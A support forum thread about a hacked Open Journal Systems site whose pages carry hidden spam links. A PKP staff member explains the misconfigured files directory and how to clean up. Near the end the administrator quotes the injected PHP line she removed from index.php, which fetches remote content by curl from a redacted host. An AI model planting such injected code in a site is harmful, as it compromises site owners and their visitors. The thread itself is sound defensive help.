OJS 3.3.0.13 security breach / malicious code being implemented on site

Alice · February 17, 2023, 12:45pm

We have had recurring problems of people/bots making accounts and then uploading junk files such as html or php files, most recently in January after which I upgraded to 3.3.0.13 from 3.3.0.6.

I delete these accounts and the associated junk files. I thought things were okay but the journal back end is now throwing errors, and the four tabs on the Submission page (My Queue, Unassigned, all Active, Archives) are all empty when they should not be, even though the Editorial Activity page correctly shows 23 active submissions.

The errors are:

“Error. An unexpected error has occurred. Please reload the page and try again” as soon as I log in.
“Failed Ajax request or invalid JSON returned” when I click on the notification bell.

The error log has this error multiple times “ojs2: 404 Not Found” but no actual PHP errors.

If I inspect the page when it shows an error, the div with the id pkpHelpPanel has a long list of hidden URLs of what look like hacked OJS journal sites (see screenshot) all containing the word “slot”. I’ve searched within my database and all files for this text. It seems the session files (e.g. sess_0119c7fc7e7afde2a95e86f73a772aba) in the tmp folder contain code to query the event_log (see screenshot) for files for which the original filename contained “slot”. I’ve deleted these records, and files, and the session files. However logging out and in again regenerates session files with this malicious code.

It seems to be a ‘task’ page that loads the list of hidden urls (/$$$call$$$/page/page/tasks?_=1676637218768).

Additionally, every page on my site has a list of hidden URLS at the very last line (below the closing tags) like this:

I don’t know where there malicious code is that is causing this, or how to get rid of it. As I said, I’ve searched within the databas and files. And how to get the submissions tabs to show the correct files. I have daily backups and could revert to a previous version but - without fixing the actual problem - I suspect the same problems will arise. Looking back at a copy of my 3.3.0.6 version I see that this problem was there too and therefore was not removed by the upgrading process.

This is obviously something which has affected many other sites (the list being displayed is long).

Sorry for the long post. I’ve spent a lot of time trying to work out what is going on and I’m not sure what else to try.

If anyone could assist at all, I’d be very, very grateful!

asmecher · February 17, 2023, 2:43pm

Hi @Alice,

Is your files_dir (in config.inc.php) configured inside your web root? If so, that’s an unsafe misconfiguration, and the most common way OJS sites get attacked.

Regards,
Alec Smecher
Public Knowledge Project Team

Alice · February 17, 2023, 3:30pm

Hi Alec,

Thanks for your reply. It does seem to be. Can I just move it up a level and change the path in config.inc.php? Or is it more complicated than that?

Thanks

asmecher · February 17, 2023, 3:41pm

Hi @Alice,

If you can move the files directory outside of public_html (or whatever the equivalent is on your server), and configure config.inc.php to point to its new location, that’ll prevent new malicious attempts to break in.

However, it sounds like someone has already used this to break in and edit files on your server (to add spam to the scripts). They have likely done this by installing a backdoor script somewhere in public_html, and you’ll need to make sure that is gone.

Cleaning up after a server break-in is a little beyond the scope of this forum, but in short, the safest way to clean up is to:

Get fresh (trusted) copies of as much of the site as you can, and
Manually review whatever you can’t rebuild.

Any directory can contain a malicious but harmlessly-named extra .php or .phtml file, and any existing .php script can contain malicious modifications. So every directory that you can remove from your server entirely and replace with a fresh copy is a directory you won’t have to worry about.

If you want to replace your OJS installation directory entirely with a fresh (safe) copy, you’ll need to save a few pieces from your old installation:

public directory (which should contain subdirectories and image files only)
config.inc.php (the configuration file)

You’ll also have to re-install any extra plugins.

Regards,
Alec Smecher
Public Knowledge Project Team

Alice · February 17, 2023, 3:44pm

Thank you. I’ll follow your advice. Much appreciated!

Alice · February 20, 2023, 3:46pm

Thanks Alec,

With your help I have fixed the issue. In case it helps someone else, in addition to doing as you described above to move the files folder and replacing OJS files from a clean copy, I also inspected the files in the public_html root and deleted a line of malicious code that had been added to the bottom of index.php in root. This was linking to a text file on another (presumably hacked) site and that is where all the malicious links were coming from:

$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://(removed)/bl/1.txt");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);curl_close($ch);echo $output;?>

Thanks for your prompt help.

asmecher · February 20, 2023, 6:12pm

Hi @Alice,

Glad to hear it looks like it’s resolved! I removed the spammer domain from your post above, just to avoid giving them any extra attention.

Thanks,
Alec Smecher
Public Knowledge Project Team

asmecher · February 27, 2023, 4:00pm

This topic was automatically closed after 9 days. New replies are no longer allowed.